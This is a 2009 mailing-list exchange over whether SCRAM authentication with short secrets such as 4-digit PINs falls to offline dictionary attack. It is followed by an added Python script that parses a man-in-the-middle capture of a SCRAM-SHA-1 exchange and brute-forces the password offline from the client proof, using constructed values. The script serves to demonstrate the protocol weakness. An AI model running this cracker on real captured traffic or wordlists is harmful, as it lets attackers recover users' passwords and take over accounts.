On Fri, Mar 6, 2009 at 6:39 AM, Dave Cridland <[email protected]> wrote:
> On Fri Mar 6 14:03:58 2009, Eric Rescorla wrote:
>>
>> On Fri, Mar 6, 2009 at 5:04 AM, Dave Cridland <[email protected]> wrote:
>> > I don't think it is - we're not talking in terms of a long-term
>> > shared-secret, we're talking about an ephemeral secret shared (say) over
>> > the phone, used purely to verify a channel, and, by that, optionally the
>> > peer's X.509 cert.
>>
>> You're assuming that these aren't separated by a time scale of hours to
>> days. I don't think that's at all safe.
>>
>>
> Well, yes. But you can't do an offline dictionary attack on SCRAM until
> you've witnessed the SCRAM exchange. By which time it's too late to do
> anything about it.

Uh, no. You MITM the initial connection, then wait for one side to offer
his proof. You then simulate a failure, crack the password, and move on.
Note that if the password is short enough, you can crack it in real time
and move on.

>> > If an offline dictionary attack can be mounted within the kind of
>> > timescales we're talking, then I'm off to buy a tinfoil hat, because
>> > those guys have had it right all along... ;-)
>>
>> I heard suggestions of 4 digit PINs. Those can be brute-forced in less
>> than a second.
>
> Still needs time travel to make this attack work, doesn't it?

No.

-Ekr
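The attack Ekr describes, worked through as an added example (this code is not part of the thread and not anyone's deployed implementation). It follows the SCRAM-SHA-1 derivation in RFC 5802: a MITM relays client-first and server-first, records the client-final message containing the ClientProof, and can then return an authentication failure and brute-force the proof offline using only the salt, iteration count and nonces it already saw. The salt, nonces, user name, iteration count and the 4-digit PIN are all constructed for the demo; the iteration count is deliberately lower than the 4096 the RFC recommends, which only scales the attacker's cost linearly and makes no difference for a search space of 10^4.

```python
"""Offline brute force of a SCRAM (RFC 5802) client proof captured by a MITM.

Added example for the mailing-list thread above; all messages, nonces, the
salt, the user name and the PIN are constructed, not captured from anywhere.
"""
import base64
import hashlib
import hmac

HASH = "sha1"  # SCRAM-SHA-1; the attack is identical for SCRAM-SHA-256


def hi(password: bytes, salt: bytes, iterations: int) -> bytes:
    """Hi() from RFC 5802 section 2.2 is PBKDF2 with HMAC-SHA-1 as the PRF."""
    return hashlib.pbkdf2_hmac(HASH, password, salt, iterations)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def derive(password: bytes, salt: bytes, iterations: int, auth_message: bytes):
    """Return (ClientProof, ServerSignature) for this password and AuthMessage.

    SASLprep is omitted: for an all-digit PIN it is the identity mapping.
    """
    salted = hi(password, salt, iterations)
    client_key = hmac.new(salted, b"Client Key", HASH).digest()
    stored_key = hashlib.new(HASH, client_key).digest()
    client_sig = hmac.new(stored_key, auth_message, HASH).digest()
    server_key = hmac.new(salted, b"Server Key", HASH).digest()
    server_sig = hmac.new(server_key, auth_message, HASH).digest()
    return xor_bytes(client_key, client_sig), server_sig


# --- Constructed exchange, as relayed and recorded by the MITM ------------
SALT = b"\x01" * 16      # constructed; a real server picks this at random
ITERATIONS = 256         # constructed; RFC 5802 recommends >= 4096
PIN = b"7341"            # constructed 4-digit PIN
CLIENT_FIRST_BARE = b"n=alice,r=fyko+d2lbbFgONRv9qkxdawL"
SERVER_FIRST = (b"r=fyko+d2lbbFgONRv9qkxdawL3rfcNHYJY1ZVvWVs7j,s="
                + base64.b64encode(SALT) + b",i=" + str(ITERATIONS).encode())
CLIENT_FINAL_WITHOUT_PROOF = b"c=biws,r=fyko+d2lbbFgONRv9qkxdawL3rfcNHYJY1ZVvWVs7j"
AUTH_MESSAGE = CLIENT_FIRST_BARE + b"," + SERVER_FIRST + b"," + CLIENT_FINAL_WITHOUT_PROOF


def client_final_message(password: bytes) -> bytes:
    """What the honest client sends as its client-final-message."""
    proof, _ = derive(password, SALT, ITERATIONS, AUTH_MESSAGE)
    return CLIENT_FINAL_WITHOUT_PROOF + b",p=" + base64.b64encode(proof)


def parse_captured(server_first: bytes, client_final: bytes):
    """Pull salt, iteration count and ClientProof out of the recorded messages."""
    attrs = dict(f.split(b"=", 1) for f in server_first.split(b","))
    salt = base64.b64decode(attrs[b"s"])
    iterations = int(attrs[b"i"])
    without_proof, proof_b64 = client_final.rsplit(b",p=", 1)
    return salt, iterations, without_proof, base64.b64decode(proof_b64)


def crack(client_first_bare, server_first, client_final, candidates):
    """Offline dictionary attack over the recorded exchange.

    Nothing further is needed from the real server or client: once the
    client-final message is in hand the MITM can answer with a failure and
    grind through candidates at leisure (or, for a PIN, in real time).
    """
    salt, iterations, without_proof, proof = parse_captured(server_first, client_final)
    auth_message = client_first_bare + b"," + server_first + b"," + without_proof
    for candidate in candidates:
        guess, _ = derive(candidate, salt, iterations, auth_message)
        if hmac.compare_digest(guess, proof):
            return candidate
    return None


def four_digit_pins():
    """The whole search space for a 4-digit PIN."""
    return (("%04d" % n).encode() for n in range(10000))


if __name__ == "__main__":
    captured = client_final_message(PIN)
    print("recovered PIN:", crack(CLIENT_FIRST_BARE, SERVER_FIRST, captured, four_digit_pins()))
```

Running it recovers the PIN from the single recorded message; the same loop fed a wordlist instead of `four_digit_pins()` is the ordinary offline dictionary attack on any SCRAM password, which is why the exchange itself, not the later use of the secret, is the point at which it is already too late.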
